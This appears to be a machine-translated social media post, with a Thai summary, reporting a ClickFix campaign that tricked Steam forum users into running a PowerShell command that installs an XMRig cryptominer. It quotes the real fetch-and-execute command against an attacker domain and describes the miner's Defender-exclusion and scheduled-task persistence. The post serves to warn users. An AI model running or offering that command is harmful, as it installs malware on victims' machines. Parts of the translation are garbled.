Automatically translated.View original post

The ClickFix campaign was found on the Steam Forum web board.

The ClickFix campaign was found on the Steam Forum web board, accidentally following the malware.

A report from the official website of famous antivirus developer Kaspersky mentioned the detection of a ClickFix malware release campaign on the Steam Forum web board on the Steam platform, a web board that gamers often use to inquire into the gaming community when experiencing problems such as game freezes, unplayable, or other play techniques. Hackers will respond to threads where the target victim is experiencing technical problems, such as game freezes or missing items in the glove box, etc. The comment recommends that the victim press the Run feature by pressing The Windows + R logo button is used to open PowerShell and then copy the code placed inside the comment and paste it and press Run. After that, the victim restarts the machine. It is claimed to help the victim solve the problem, but it is actually downloading malware to install it on the machine.

The malware that is the case in this campaign is a malware that relies on the resources of the victim's machine to mine the Crypto Miner coin called XMRig, which is used to mine the Monero Crypto Curren coin. This malware is inherently not malware, but real coin mining software that is developed open source, but malware because hackers usually install it on the victim's machine without the victim's permission. And because this tool relies on very high processing power, so gamers often use a processing chip. Omen (CPU) and high-end graphics processing chips (GPUs) are therefore fine victims of hackers for campaigns with malware applications of such types.

The source team also explained an interesting thing about this campaign: the PowerShell script, where hackers trick victims into running, which looks simple but dangerous, which the script looks like:

IRM msfconfig.icu | iex

Each part of the script is a different function.

Irm refers to Invoke-RestMethod, which orders contact with websites within the script to retrieve information (Response).

Msfconfig.icu refers to the destination site, which is the name of the hacker the script will contact.

Iex refers to Invoke-Expressions, which is a step to get Irm Maran-derived data on PowerShell.

The downloaded script is a PowerShell script that claims to be software for optimization of the machine. The script is scheduled to alert the victim that the script is operating so that the machine can perform most effectively, such as deleting junk files, updating new drivers, detecting errors on the hard drive, etc. In fact, the script checks whether it is working with the Administrator's permission. If it is checked, it will create a hidden folder within C: WindowsBackground and add an Exclusion List. On a cyber protection tool like Mincrosoft Defender to prevent detection, the malware listed above is downloaded to a folder inside C: WindowsBackground and named to look like a file for an important system like system.exe. After the malware has been successfully embedded, the script will run a task schedule under the name XMRig-{ computer name} to ensure that the malware is always reopened despite the reboot.

# Trending # Lemon 8 Howtoo # lemon 8 diary # clickfix # STEAM

9/9 Edited to

... Read moreจากประสบการณ์ของผู้ใช้ในชุมชนเกมเมอร์ที่ต้องการความช่วยเหลือผ่านเว็บบอร์ด Steam Forum พบว่าแคมเปญมัลแวร์ ClickFix นี้เป็นอีกหนึ่งรูปแบบการโจมตีที่แฮกเกอร์ใช้กลยุทธ์เดิมๆ คือ อาศัยความไว้วางใจและความไม่รู้ของเหยื่อ ด้วยการแอบแฝงเป็นคำแนะนำเทคนิคแก้ปัญหาเกมที่ดูน่าเชื่อถือ เช่น การใช้คำสั่ง Run ด้วย Windows + R เพื่อเปิด PowerShell และวางโค้ดที่ได้รับมาโดยตรง หลายคนที่ประสบปัญหาเกมค้างหรือของในเกมหายเมื่อเห็นคำแนะนำแบบนี้ อาจเผลอกดทำตามโดยไม่ทันรู้ว่ากำลังเปิดทางให้มัลแวร์สามารถลงเครื่องคอมพิวเตอร์ได้ง่าย ๆ การทำงานของมัลแวร์นี้จะใช้พลังงานจาก CPU และ GPU ที่สูงมากในการขุดเหรียญคริปโต Monero ผ่านโปรแกรม XMRig ซึ่งทำให้เครื่องทำงานช้าลงและมีอาการร้อนสูงเกินปกติ ในแง่ของการป้องกัน สิ่งที่สำคัญคือเราควรระมัดระวังการรับคำแนะนำจากแหล่งที่ไม่น่าเชื่อถือ โดยเฉพาะถ้าต้องใช้คำสั่งที่เปิดสิทธิ์ระดับผู้ดูแลระบบ เช่น Powershell หรือ CMD นอกจากนี้ควรตั้งค่าระบบป้องกันมัลแวร์และเลือกใช้งานโปรแกรมแอนตี้ไวรัสที่มีการอัปเดตล่าสุด เพื่อป้องกันการติดตั้งซอฟต์แวร์ที่ไม่ได้รับอนุญาต ที่สำคัญควรตรวจสอบความน่าเชื่อถือของกระทู้และผู้ตอบในเว็บบอร์ดก่อนทำตามทุกครั้ง ด้วยความระมัดระวังและการเรียนรู้เกี่ยวกับเทคนิคที่แฮกเกอร์ใช้ เราสามารถลดความเสี่ยงที่จะถูกแอบแฝงมัลแวร์ได้อย่างมาก และรักษาความปลอดภัยของข้อมูลรวมถึงประสิทธิภาพของเครื่องคอมพิวเตอร์ให้ดีอยู่เสมอ